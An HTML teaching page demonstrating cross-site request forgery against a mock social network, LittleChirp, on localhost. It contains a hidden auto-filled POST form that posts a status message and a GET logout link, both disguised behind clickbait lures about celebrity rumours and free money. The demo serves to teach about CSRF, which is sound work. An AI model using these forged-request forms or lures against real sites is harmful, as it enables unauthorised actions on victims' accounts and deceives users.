<html>   
<title>
    Cross-site request forgery demonstration site
  </title>
  <body>
  <h1>Cross-site request forgery demonstration site</h1>
  <p>
  This website attacks the victim application LittleChirp, which is a mockup of a 
  social network site that allows to post small status messages.
  
  It assumes that LittleChirp runs at http://localhost:8080/victimapp
  </p>
  <h2>Attack 1 - POST request</h2>
  <p>
    This attack submits a status message if you are currently logged in in LittleChirp. It would also be possible to make submit the 
    hidden form with javascript on an onClick event. To keep this site simple a submit button is used.
  </p>
  <div style="background-color:#ECECEC"> 
    <img src="res/honey.jpg" style="width:200px"/>
    <p>
    Just press go, to see the latest rumors about celebrities.
    </p>
    <form action="http://localhost:8080/victimapp/status.statusform" method="post">
      <input type="hidden" name="statusMessage" value="My evil message, that maybe contains also some bad javascript code."/>
      <input type="hidden" name="t:formdata" value="H4sIAAAAAAAAAFvzloG1XIxBJLgksaS02KoYTOWmFhcnpqcWFzGY5hel6yUWJCZnpOqVJBakFpcUVZrqJecXpeZkJuklJRan6jkmAQUTk0vcMlNzUlSCU0tKC1RDD3M/FD3+h4mB0YeBOzk/r6QoP8cvMTe1hEHIJyuxLFE/JzEvXT+4pCgzL926oqCEgRdisS/EYjwOciTVQQFF+clA3cGlSbmZxcWZ+XmH16WYpH2bd46JgaGiAAAF4Kgw/wAAAA==">
      <input type="submit" value="Go"/>
    </form> 
  </div>
  
  <h2>Attack 2 - GET request</h2>
  <p>
    This attack does a logout of the user. Not really a big thing, but a bad designed web application may use GET requests for actions that trigger some
    main functionality or database updates.
  </p>
  <div style="background-color:#ECECEC"> 
    <a href="http://localhost:8080/victimapp/index.layout.logout"><img src="res/money.jpg" style="width:200px"/></a>
    <p>
    Click on the image above to receive a million dollar.
  </div>
    
  </body>
</html>